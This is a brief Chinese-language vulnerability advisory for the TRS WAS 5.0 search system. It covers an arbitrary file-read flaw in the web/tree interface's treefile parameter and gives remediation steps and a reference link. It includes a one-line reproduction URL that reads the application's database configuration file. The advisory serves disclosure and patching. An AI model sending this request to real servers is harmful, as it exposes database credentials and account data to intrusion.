漏洞简介

拓尔思中文检索系统TRSWAS5.0 web/tree接口treefile参数存在文件读取漏洞，可读取数据库配置文件、账户密码等信息，导致配置文件信息泄露威胁网站安全。

复现过程

http://xx.com/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

如漏洞存在，则显示文件内容

修复手段

目前官方已经在新的版本中修复该漏洞，可从官方下载进行升级相应组件或者使用附件里的文件trswas.jar替换目录D:\TRS\TRSWAS5.0\Tomcat\webapps\was5\WEB-INF\lib下的文件

参考

https://blog.csdn.net/weixin_43650289/article/details/109072674